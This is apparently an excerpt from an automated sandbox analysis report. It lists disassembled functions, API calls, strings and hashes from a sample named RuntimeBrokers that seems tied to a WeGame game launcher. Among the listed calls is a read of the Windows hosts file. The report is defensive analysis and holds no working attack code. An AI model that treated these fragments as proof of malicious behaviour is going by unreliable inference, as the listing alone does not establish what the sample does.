                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: H_prolog3_$D@2@@std@@D@std@@U?$char_traits@V?$allocator@V?$basic_string@$?u8to16@common@ierd_tgp@@U?$char_traits@_V?$allocator@_V?$basic_string@_W@2@@4@@W@std@@_waccess$?get_app_sub_path@?get_log_instance@base@@Application@common@ierd_tgp@@CreateDirectoryErrorLastLogger@1@V45@@
                                        • String ID: %s\%s
                                        • API String ID: 1378938387-4073750446
                                        • Opcode ID: 1d78dacee80844d0a776710ff58e296e1d2528624c4478b479b551417f58fb73
                                        • Instruction ID: 186ba79fd336f912ac3e024cf6bc9be46a77f324807e6c764031f9fe68d01d95
                                        • Opcode Fuzzy Hash: 1d78dacee80844d0a776710ff58e296e1d2528624c4478b479b551417f58fb73
                                        • Instruction Fuzzy Hash: DA511271D05258DADF14DFA9C884BDDFBB4BF29304FA440AED109A7681DB309A49CF61
                                        Function 6C0AE8D0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 139COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 6C0AA8F0: memmove.VCRUNTIME140(?,?,6C0B5839,?,?,00000000,?,?,6C0B5839,?,?), ref: 6C0AA917
                                          • Part of subcall function 6C0AEA70: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,B33B76E5,?,?,00000000), ref: 6C0AEB96
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,00000000,Bad unicode escape sequence in string: four digits expected.,0000003C,B33B76E5,-00000002,?), ref: 6C0AE982
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,00000000,Bad unicode escape sequence in string: hexadecimal digit expected.,00000042,B33B76E5,-00000002,?), ref: 6C0AEA3B
                                        Strings
                                        • Bad unicode escape sequence in string: four digits expected., xrefs: 6C0AE918
                                        • Bad unicode escape sequence in string: hexadecimal digit expected., xrefs: 6C0AE9DC
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$memmove
                                        • String ID: Bad unicode escape sequence in string: four digits expected.$Bad unicode escape sequence in string: hexadecimal digit expected.
                                        • API String ID: 15630516-3825735986
                                        • Opcode ID: 6faec94f5f32adeded32072128fef6e7edab4b5d79858519c9065e0ab2dbe1d3
                                        • Instruction ID: d0a6191967d26d00434e659c149ada4889260c760d3aab5d82048e466dba63d5
                                        • Opcode Fuzzy Hash: 6faec94f5f32adeded32072128fef6e7edab4b5d79858519c9065e0ab2dbe1d3
                                        • Instruction Fuzzy Hash: 84411471A006089FDB04CFE8C884BDEBBF5EF5A324F144519E461E7786C774A846CBA1
                                        Function 6C0FBD60 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 119COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C0FBD6A
                                        • ?get_global_proxy_info@net@ierd_tgp@@YA_NPAUproxy_info_t@12@@Z.COMMON(?,0000009C,6C0FA824,00000000,?), ref: 6C0FBD8C
                                          • Part of subcall function 6C12B444: __EH_prolog3.LIBCMT ref: 6C12B44B
                                        • ?get_proxy_for_url_v2@net@ierd_tgp@@YA_NPBDPAUproxy_info_t@12@@Z.COMMON(?,?,0000009C,6C0FA824,00000000,?), ref: 6C0FBD9E
                                          • Part of subcall function 6C12BA3B: __EH_prolog3_GS.LIBCMT ref: 6C12BA42
                                          • Part of subcall function 6C12BA3B: ?get_proxy_for_url_v2@net@ierd_tgp@@YA_NPB_WPAUproxy_info_t@12@@Z.COMMON(?,?,?,?,00000034,6C0FBDA3,?,?,0000009C,6C0FA824,00000000,?), ref: 6C12BAAD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: Uproxy_info_t@12@@$?get_proxy_for_url_v2@net@ierd_tgp@@H_prolog3_$?get_global_proxy_info@net@ierd_tgp@@H_prolog3
                                        • String ID: ://
                                        • API String ID: 1862413449-1869659232
                                        • Opcode ID: 1516f1a8b1d058ebde7b7d5a2e39982cf94d0080e87fcedabfe17e27cf3dc063
                                        • Instruction ID: 7eae15efd5c36260e55d67208c0bfedcd10e84fa81232c6395ed3d6c275f1cf1
                                        • Opcode Fuzzy Hash: 1516f1a8b1d058ebde7b7d5a2e39982cf94d0080e87fcedabfe17e27cf3dc063
                                        • Instruction Fuzzy Hash: EE415D71D00218DEDF10DFE4C894BDDB7F8AF15208F6440A9E5546B681DB34AA8ACF62
                                        Function 6C0FEDF5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 119COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C0FEDFF
                                        • memset.VCRUNTIME140(?,00000000,00000208,00000234,6C0FE38F,?), ref: 6C0FEE16
                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 6C0FEE2A
                                          • Part of subcall function 6C0FDF33: __EH_prolog3_GS.LIBCMT ref: 6C0FDF3D
                                          • Part of subcall function 6C0FDF33: CreateFileW.KERNEL32(?,00000001,00000003,00000000,00000003,00000080,00000000,00000110,6C0FEEB6,?,?,\drivers\etc\hosts), ref: 6C0FDF77
                                          • Part of subcall function 6C0FDF33: GetLastError.KERNEL32 ref: 6C0FDF88
                                          • Part of subcall function 6C0FDF33: ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C0FDF94
                                          • Part of subcall function 6C0AA2C0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C0AA32F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: H_prolog3_$?get_log_instance@base@@CreateDirectoryErrorFileLastLogger@1@System_invalid_parameter_noinfo_noreturnmemset
                                        • String ID: \drivers\etc\hosts
                                        • API String ID: 3358435848-1867556408
                                        • Opcode ID: d142a14f91280002bbfa0f80cbb1d83c56176a61c9c15d8f50142b470d457106
                                        • Instruction ID: 7e2b42ec938102289561b3a824560dd46a08fc70c7afbc657650d025067f007a
                                        • Opcode Fuzzy Hash: d142a14f91280002bbfa0f80cbb1d83c56176a61c9c15d8f50142b470d457106
                                        • Instruction Fuzzy Hash: 9E417C719462289ADF20CF94C8987CDB7F4AF15314F6441D9D868A7680DB386BCACFA1
                                        Function 0040C67C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 106synchronizationCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0040C8ED: _strlen.LIBCMT ref: 0040C953
                                        • CreateMutexW.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,F107BA66), ref: 0040C814
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2954513519.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2954495294.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954661807.0000000000577000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954678573.0000000000578000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954698601.000000000058A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: CreateMutex_strlen
                                        • String ID: %s%s$DNFLauncher::CreateTCLSCoreMuext() mutexName: %s$TCLS_CORE_MUTEX_
                                        • API String ID: 235056417-1489405723
                                        • Opcode ID: f4ed1429e5d8e576ef496cc3d534eaa3a568af75d35bb9c0613dfe26838026cb
                                        • Instruction ID: dda7a9a1b5391d31dae3c151c46829a0939e561f4d8c1cf4badfad78fdb15895
                                        • Opcode Fuzzy Hash: f4ed1429e5d8e576ef496cc3d534eaa3a568af75d35bb9c0613dfe26838026cb
                                        • Instruction Fuzzy Hash: 6C415BB1C0525CEEDB10DB64DD45BDDBBB4AB05308F1041EEE208A7282EB755B88DF29
                                        Function 6C0A25C0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 87stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • strncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000020,0000061C,000000FF,?,00000000,?,6C0A2776,00000000,0000002C), ref: 6C0A262D
                                        • strncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000020,?,000000FF,00000000,?,6C0A2776,00000000,0000002C), ref: 6C0A2670
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: strncpy_s
                                        • String ID: $v'l
                                        • API String ID: 1419134015-1334986637
                                        • Opcode ID: 497a80de21a92ba75da3551667fdd4e854478f562a584d8233261d03625734fe
                                        • Instruction ID: 94a58a0758760778c86522a4516a3c0a09457fdb40ae7af44f2cc2dcba62dc96
                                        • Opcode Fuzzy Hash: 497a80de21a92ba75da3551667fdd4e854478f562a584d8233261d03625734fe
                                        • Instruction Fuzzy Hash: BF31EFB1500B169FD314CFA4C440B92B7F4FF08324F15866DD8AA976A2E731B969CB90
                                        Function 6C12E6BB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 83COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C12E6C2
                                          • Part of subcall function 6C12E23A: __EH_prolog3.LIBCMT ref: 6C12E241
                                          • Part of subcall function 6C12E23A: ?get_comp_mgr_instance@common@ierd_tgp@@YAAAVComponent_mgr@12@XZ.COMMON(00000018,6C12E6E7,6C439534,6C439584,00000054,6C12BD53,TGP_COM_URL), ref: 6C12E246
                                          • Part of subcall function 6C12E23A: ?find_component@Component_mgr@common@ierd_tgp@@QAE?AV?$weak_ptr@UIComponent@common@ierd_tgp@@@std@@ABVcomponent_interface_type@23@@Z.COMMON(?,?,00000018,6C12E6E7,6C439534,6C439584,00000054,6C12BD53,TGP_COM_URL), ref: 6C12E254
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000054,6C12BD53,TGP_COM_URL), ref: 6C12E722
                                          • Part of subcall function 6C0BCEF6: memmove.VCRUNTIME140(00000000,?,?,00000001,?,?,?,?,?,?,6C0BA734,?,00000004,6C0BA09E,?,B33B76E5), ref: 6C0BCF55
                                        Strings
                                        • [LoadStrErr] oversea strid=%ws, xrefs: 6C12E766
                                        • d:\ci_dev\wegame_client\codes\common\src\overseas.cpp, xrefs: 6C12E746
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ?find_component@?get_comp_mgr_instance@common@ierd_tgp@@?get_log_instance@base@@Component@common@ierd_tgp@@@std@@Component_mgr@12@Component_mgr@common@ierd_tgp@@H_prolog3H_prolog3_Logger@1@V?$weak_ptr@Vcomponent_interface_type@23@@memmove
                                        • String ID: [LoadStrErr] oversea strid=%ws$d:\ci_dev\wegame_client\codes\common\src\overseas.cpp
                                        • API String ID: 1054616610-3045326849
                                        • Opcode ID: 62177417d56a1448495f230ab87b2baf022d2e7487a1106cc9271d10605fe5d2
                                        • Instruction ID: 49fdcb3cf210888fb01413b06c0d0c1da5df8bb7f5318a3073ab665c748b7264
                                        • Opcode Fuzzy Hash: 62177417d56a1448495f230ab87b2baf022d2e7487a1106cc9271d10605fe5d2
                                        • Instruction Fuzzy Hash: 8F31D135A01244DBDF00EFA8C895ADD7BB0AF65318F24419CD4546F781DB36AB4ACBD1
                                        Function 6C12E2FB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 83COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C12E302
                                          • Part of subcall function 6C12E0C7: __EH_prolog3.LIBCMT ref: 6C12E0CE
                                          • Part of subcall function 6C12E0C7: GetModuleHandleA.KERNEL32(common.dll,?dyn_comp_mgr_find_component@@YA?AV?$weak_ptr@UIComponent@common@ierd_tgp@@@std@@ABVcomponent_interface_type@common@ierd_tgp@@@Z,00000018,6C12E327,6C439534,6C439584,00000054), ref: 6C12E0DD
                                          • Part of subcall function 6C12E0C7: GetProcAddress.KERNEL32(00000000), ref: 6C12E0E4
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000054), ref: 6C12E362
                                          • Part of subcall function 6C0BCEF6: memmove.VCRUNTIME140(00000000,?,?,00000001,?,?,?,?,?,?,6C0BA734,?,00000004,6C0BA09E,?,B33B76E5), ref: 6C0BCF55
                                        Strings
                                        • [LoadStrErr] oversea strid=%ws, xrefs: 6C12E3A6
                                        • d:\ci_dev\wegame_client\codes\common\src\overseas.cpp, xrefs: 6C12E386
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ?get_log_instance@base@@AddressH_prolog3H_prolog3_HandleLogger@1@ModuleProcmemmove
                                        • String ID: [LoadStrErr] oversea strid=%ws$d:\ci_dev\wegame_client\codes\common\src\overseas.cpp
                                        • API String ID: 2895597790-3045326849
                                        • Opcode ID: 3697c92080d25e96976ee3130592f3e21f135a20e1bec37824b47c14820ed2f0
                                        • Instruction ID: fd0f8689399c47ed141c98bef1cff81947f582c6e8c5861eff9562c2f208f98c
                                        • Opcode Fuzzy Hash: 3697c92080d25e96976ee3130592f3e21f135a20e1bec37824b47c14820ed2f0
                                        • Instruction Fuzzy Hash: 5531D131A01244EBCF00EFA8C851ADD7BB0AF51219F24819CD4046B781DB36EB8ACBD1
                                        Function 0041C2C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004824EB: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0048250C
                                          • Part of subcall function 004824EB: _wcsrchr.LIBVCRUNTIME ref: 0048251F
                                        • GetProcAddress.KERNEL32(?,CreateRepair), ref: 0041C371
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2954513519.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2954495294.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954661807.0000000000577000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954678573.0000000000578000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954698601.000000000058A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: AddressFileModuleNameProc_wcsrchr
                                        • String ID: %s%s$CreateRepair$\RepairGameLog\EyGameRepair.log
                                        • API String ID: 2176652394-1168563413
                                        • Opcode ID: dd463ad1c4c466c5e8508c2f4ad02cb09c136991ed4d0ca8fc05f7b1a578d9f2
                                        • Instruction ID: 13eeca9bbde35fd5d30bfc6f1cbc92e03997cec0cf60c00f0ab1d364d81e85ff
                                        • Opcode Fuzzy Hash: dd463ad1c4c466c5e8508c2f4ad02cb09c136991ed4d0ca8fc05f7b1a578d9f2
                                        • Instruction Fuzzy Hash: 0D312AB0900218DFDB24EB54DD4ABDDB7B4BB04718F8041EAE619A72D1DB785B89CF18
                                        Function 0048648D Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65timethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLocalTime.KERNEL32(?), ref: 004864BA
                                        • GetCurrentThreadId.KERNEL32 ref: 004864DE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2954513519.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2954495294.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954661807.0000000000577000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954678573.0000000000578000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954698601.000000000058A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: CurrentLocalThreadTime
                                        • String ID: PdH$[T%d][M%d][%s]%s
                                        • API String ID: 3810582335-331731800
                                        • Opcode ID: 26509f31f4dbd810ddcb3953b2dff89f2ab2e8cedfdd5b14f77a212195055405
                                        • Instruction ID: 6f3d23f502ae861160687e33c51a8f7f9aaa40c7d471a521fd3c45cc4acf6cfc
                                        • Opcode Fuzzy Hash: 26509f31f4dbd810ddcb3953b2dff89f2ab2e8cedfdd5b14f77a212195055405
                                        • Instruction Fuzzy Hash: 8121807594020CBFDB20EFA5DC89FD977B8AF18304F0040A6B608E61A1D7749A94DF95
                                        Function 6C0E6DEB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C0E6DF5
                                          • Part of subcall function 6C0C51EA: __EH_prolog3.LIBCMT ref: 6C0C51F1
                                          • Part of subcall function 6C0C51EA: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(00000008,6C0C7CA5,00000003,00000001,000000B0,6C0C4E75,?,?,0000003C,6C0C743F,?,-00000074,00000000), ref: 6C0C5215
                                          • Part of subcall function 6C0C51EA: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140(?,00000000,00000008,6C0C7CA5,00000003,00000001,000000B0,6C0C4E75,?,?,0000003C,6C0C743F,?,-00000074,00000000), ref: 6C0C522E
                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP140(00000000,00000029,00000003,00000001,000000B4,6C0E51ED,?,?,?,?,00000028,6C0E52A0,?,?,?,00000004), ref: 6C0E6E56
                                        • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(?,00000003,00000001,000000B4,6C0E51ED,?,?,?,?,00000028,6C0E52A0,?,?,?,00000004,6C0E2C18), ref: 6C0E6EA2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: U?$char_traits@$D@std@@@std@@$H_prolog3$??0?$basic_ios@??0?$basic_iostream@??1?$basic_ios@??6?$basic_ostream@D@std@@@1@@V01@V?$basic_streambuf@
                                        • String ID: <unspecified file>
                                        • API String ID: 3606716362-520387994
                                        • Opcode ID: 4978954e888a3ba7e4a6e26f6228347da482c0838a0a9ea3cf45b77608fc3c3c
                                        • Instruction ID: e496890673797378261b7ca29beaace36d3e0a262922ba2a6cf317c6cd4d11c5
                                        • Opcode Fuzzy Hash: 4978954e888a3ba7e4a6e26f6228347da482c0838a0a9ea3cf45b77608fc3c3c
                                        • Instruction Fuzzy Hash: AA114D31904249DFEF14CBA0D819BDD3BF9EB08318F50045AF504AB6D0DB75AA58CB52
                                        Function 6C0B6092 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,6C0B61E9,?,?,?,?,00000000), ref: 6C0B60E2
                                        • memmove.VCRUNTIME140(?,?,?), ref: 6C0B60FD
                                        • OutputDebugStringA.KERNEL32(Check log buffer fail.,?,?,?,?,?,6C0B61E9,?,?,?,?,00000000), ref: 6C0B6113
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: DebugOutputStringmemmovestrncmp
                                        • String ID: Check log buffer fail.
                                        • API String ID: 2262755192-1520868631
                                        • Opcode ID: cc3c49202aa94c30103e7bf4e751d1c299a0219303511d9ccca0885045c7ea3a
                                        • Instruction ID: e84f64ab248fcd62c36cef7d1f22e3b91f6387abeb75503f3bf50f81bd40752d
                                        • Opcode Fuzzy Hash: cc3c49202aa94c30103e7bf4e751d1c299a0219303511d9ccca0885045c7ea3a
                                        • Instruction Fuzzy Hash: D0119D32501614DBDB24CF15C840B8A7BF8FF42758F180D19E959B7951D372E958CB91
                                        Function 6C0E79A8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 53COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 6C0E4133: __EH_prolog3.LIBCMT ref: 6C0E413A
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C0E79FB
                                          • Part of subcall function 6C0BA5EF: __EH_prolog3.LIBCMT ref: 6C0BA5F6
                                        Strings
                                        • d:\ci_dev\wegame_client\codes\common\src\cfg_file.cpp, xrefs: 6C0E7A1F
                                        • std exception in get_file_path_by_key: %1%, xrefs: 6C0E79A8
                                        • ", xrefs: 6C0E7A49
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
